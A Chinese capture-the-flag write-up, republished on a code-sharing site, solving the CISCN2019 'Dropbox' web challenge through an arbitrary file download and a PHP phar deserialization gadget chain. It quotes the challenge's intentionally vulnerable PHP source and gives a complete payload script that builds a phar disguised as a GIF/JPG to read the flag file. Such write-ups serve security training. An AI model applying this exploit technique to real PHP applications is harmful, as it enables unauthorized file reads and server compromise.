码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift

  • [CISCN2019 华北赛区 Day1 Web1]Dropbox

    先注册登录

    登录上来发现有文件上传按钮

    随便上传一个txt试一下

    只能上传gif/jpg/png,按他的要求上传一个jpg

    上传成功后有个下载按钮

    抓包看一下

    发现filename参数就是我们要下载的文件名

    读取download.php,delete.php和class.php

    download.php

    2. session_start();
    3. if (!isset($_SESSION['login'])) {
    4.     header("Location: login.php");
    5.     die();
    6. }
    7.  
    8. if (!isset($_POST['filename'])) {
    9.     die();
    10. }
    11.  
    12. include "class.php";
    13. ini_set("open_basedir", getcwd() . ":/etc:/tmp");
    14.  
    15. chdir($_SESSION['sandbox']);
    16. $file = new File();
    17. $filename = (string) $_POST['filename'];
    18. if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
    19.     Header("Content-type: application/octet-stream");
    20.     Header("Content-Disposition: attachment; filename=" . basename($filename));
    21.     echo $file->close();
    22. } else {
    23.     echo "File not exist";
    24. }
    25. ?>

    delete.php

    2. session_start();
    3. if (!isset($_SESSION['login'])) {
    4.     header("Location: login.php");
    5.     die();
    6. }
    7.  
    8. if (!isset($_POST['filename'])) {
    9.     die();
    10. }
    11.  
    12. include "class.php";
    13.  
    14. chdir($_SESSION['sandbox']);
    15. $file = new File();
    16. $filename = (string) $_POST['filename'];
    17. if (strlen($filename) < 40 && $file->open($filename)) {
    18.     $file->detele();
    19.     Header("Content-type: application/json");
    20.     $response = array("success" => true, "error" => "");
    21.     echo json_encode($response);
    22. } else {
    23.     Header("Content-type: application/json");
    24.     $response = array("success" => false, "error" => "File not exist");
    25.     echo json_encode($response);
    26. }
    27. ?>

    class.php

    2. error_reporting(0);
    3. $dbaddr = "127.0.0.1";
    4. $dbuser = "root";
    5. $dbpass = "root";
    6. $dbname = "dropbox";
    7. $db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
    8.  
    9. class User {
    10.     public $db;
    11.  
    12.     public function __construct() {
    13.         global $db;
    14.         $this->db = $db;
    15.     }
    16.  
    17.     public function user_exist($username) {
    18.         $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
    19.         $stmt->bind_param("s", $username);
    20.         $stmt->execute();
    21.         $stmt->store_result();
    22.         $count = $stmt->num_rows;
    23.         if ($count === 0) {
    24.             return false;
    25.         }
    26.         return true;
    27.     }
    28.  
    29.     public function add_user($username, $password) {
    30.         if ($this->user_exist($username)) {
    31.             return false;
    32.         }
    33.         $password = sha1($password . "SiAchGHmFx");
    34.         $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
    35.         $stmt->bind_param("ss", $username, $password);
    36.         $stmt->execute();
    37.         return true;
    38.     }
    39.  
    40.     public function verify_user($username, $password) {
    41.         if (!$this->user_exist($username)) {
    42.             return false;
    43.         }
    44.         $password = sha1($password . "SiAchGHmFx");
    45.         $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
    46.         $stmt->bind_param("s", $username);
    47.         $stmt->execute();
    48.         $stmt->bind_result($expect);
    49.         $stmt->fetch();
    50.         if (isset($expect) && $expect === $password) {
    51.             return true;
    52.         }
    53.         return false;
    54.     }
    55.  
    56.     public function __destruct() {
    57.         $this->db->close();
    58.     }
    59. }
    60.  
    61. class FileList {
    62.     private $files;
    63.     private $results;
    64.     private $funcs;
    65.  
    66.     public function __construct($path) {
    67.         $this->files = array();
    68.         $this->results = array();
    69.         $this->funcs = array();
    70.         $filenames = scandir($path);
    71.  
    72.         $key = array_search(".", $filenames);
    73.         unset($filenames[$key]);
    74.         $key = array_search("..", $filenames);
    75.         unset($filenames[$key]);
    76.  
    77.         foreach ($filenames as $filename) {
    78.             $file = new File();
    79.             $file->open($path . $filename);
    80.             array_push($this->files, $file);
    81.             $this->results[$file->name()] = array();
    82.         }
    83.     }
    84.  
    85.     public function __call($func, $args) {
    86.         array_push($this->funcs, $func);
    87.         foreach ($this->files as $file) {
    88.             $this->results[$file->name()][$func] = $file->$func();
    89.         }
    90.     }
    91.  
    92.     public function __destruct() {
    93.         $table = '
      ';
    94.         $table .= '
      95. ';
    95.         foreach ($this->funcs as $func) {
    96.             $table .= '
      97. ';
    97.         }
    98.         $table .= '
      99. ';
    99.         $table .= '
      100. ';
    100.         foreach ($this->results as $filename => $result) {
    101.             $table .= '
      102. ';
    102.             foreach ($result as $func => $value) {
    103.                 $table .= '
      104. ';
    104.             }
    105.             $table .= '
      106. ';
    106.             $table .= '
      107. ';
    107.         }
    108.         echo $table;
    109.     }
    110. }
    111.  
    112. class File {
    113.     public $filename;
    114.  
    115.     public function open($filename) {
    116.         $this->filename = $filename;
    117.         if (file_exists($filename) && !is_dir($filename)) {
    118.             return true;
    119.         } else {
    120.             return false;
    121.         }
    122.     }
    123.  
    124.     public function name() {
    125.         return basename($this->filename);
    126.     }
    127.  
    128.     public function size() {
    129.         $size = filesize($this->filename);
    130.         $units = array(' B', ' KB', ' MB', ' GB', ' TB');
    131.         for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
    132.         return round($size, 2).$units[$i];
    133.     }
    134.  
    135.     public function detele() {
    136.         unlink($this->filename);
    137.     }
    138.  
    139.     public function close() {
    140.         return file_get_contents($this->filename);
    141.     }
    142. }
    143. ?>
      144. 要读取flag的话,需要用到class.php中的File类中的close函数
       
 
          public function close() {
               return file_get_contents($this->filename);
           }
       

      再看FileList类中__call魔术方法
       
 
          public function __call($func, $args) {
               array_push($this->funcs, $func);
               foreach ($this->files as $file) {
                   $this->results[$file->name()][$func] = $file->$func();
               }
           }
       

      这个方法主要就是把$file->$func()的结果放入了$this->results里。至于[$file->name()][$func]这些东西不需要管,因为最终FileList类中的__destruct方法会把$result里面的内容给echo出来
       
 
              foreach ($this->results as $filename => $result) {
                   $table .= '
      ';
                   foreach ($result as $func => $value) {
                       $table .= '';
                   }
                   $table .= '';
                   $table .= '';
               }
      因此我们要想办法让$file=new File(),而$func()是close()。也就是说,使用了FileList类中不存在的方法close()的时候可以把close()给传进去,而$file就是$files里的,而$files是我们可控的
      发现
       
 
          public function __destruct() {
               $this->db->close();
           }
       

      User类的__destruct方法会调用close(),因此我们让$this->db是new FileList(),这个反序列化的链就构造成功了。
      User->destruct()=>FileList->call()=>File->close()=>FileList->__destruct()
      payload:
      2. class User {
      3.     public $db;
      4.     public function __construct(){
      5.         $this->db=new FileList();
      6.     }
      7. }
      8.  
      9. class FileList {
      10.     private $files;
      11.     private $results;
      12.     private $funcs;
      13.     public function __construct(){
      14.         $this->files=array(new File());
      15.     }
      16.  
      17.  
      18. }
      19.  
      20. class File {
      21.     public $filename='/flag.txt';
      22. }
      23.  
      24.  
      25. @unlink("phar.phar");
      26. $phar = new Phar("phar.phar"); //后缀名必须为phar
      27. $phar->startBuffering();
      28. $phar->setStub("GIF89a".""); //设置stub
      29. $o = new User();
      30. $phar->setMetadata($o); //将自定义的meta-data存入manifest
      31. $phar->addFromString("test.txt", "test"); //添加要压缩的文件
      32. //签名自动计算
      33. $phar->stopBuffering();
      34. ?>
      把得到的phar.phar改名为phar.jpg传上去,然后执行删除操作时添加phar://
       
    144. 

                    相关阅读:
      
                    
jmeter报Java.NET.BindException: Address already in use: connect                            
      
校友录系统                            
      
NAT-DDNS内网穿透技术,快解析DDNS的优势                            
      
【二】2D测量 Metrology——get_metrology_object_num_instances()算子                            
      
heic格式图片怎么转换jpg?                            
      
(1)多线程-线程的创建                            
      
RabbitMQ消息确认机制                            
      
Python实现人脸识别                            
      
程序员的护城河:技术深度、创新追求与软实力的完美结合                            
      
Redis未授权访问的三种利用方式                            
      
                          
                
    145. 
                    原文地址:https://blog.csdn.net/Yb_140/article/details/127788425
                
      146. 
            
        
                
      • 
                    最新文章
                
        • 
                
      • 
                    
攻防演习之三天拿下官网站群                            
        
数据安全治理学习——前期安全规划和安全管理体系建设                            
        
企业安全 | 企业内一次钓鱼演练准备过程                            
        
内网渗透测试 | Kerberos协议及其部分攻击手法                            
        
0day的产生 | 不懂代码的"代码审计"                            
        
安装scrcpy-client模块av模块异常,环境问题解决方案                            
        
leetcode hot100【LeetCode 279. 完全平方数】java实现                            
        
OpenWrt下安装Mosquitto                            
        
AnatoMask论文汇总                            
        
【AI日记】24.11.01 LangChain、openai api和github copilot                            
        
                            
                
        • 
            
      

            
        
                
      • 
                    热门文章
                
        • 
                
      • 
                    
十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!                            
        
奉劝各位学弟学妹们,该打造你的技术影响力了!                            
        
五年了,我在 CSDN 的两个一百万。                            
        
Java俄罗斯方块,老程序员花了一个周末,连接中学年代!                            
        
面试官都震惊,你这网络基础可以啊!                            
        
你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法                            
        
心情不好的时候,用 Python 画棵樱花树送给自己吧                            
        
通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!                            
        
13 万字 C 语言从入门到精通保姆级教程2021 年版                            
        
10行代码集2000张美女图,Python爬虫120例,再上征途                            
        
                            
                
        • 
            
      

        
      
    
      
        
      
            
      
                
      
                    Copyright © 2022 侵权请联系2656653265@qq.com   
                    京ICP备2022015340号-1
                
      
                
      
                    正则表达式工具
                    cron表达式工具
                    密码生成工具
                
      
                
      
                    
                    
      京公网安备 11010502049817号
      
                
      
            
      
        
      
    
      
  

      ' . htmlentities($func) . 'Opt
      ' . htmlentities($value) . 'htmlentities($filename) . '">下载 / 删除
       
 
 
 
 
 

      ' . htmlentities($value) . '下载 / 删除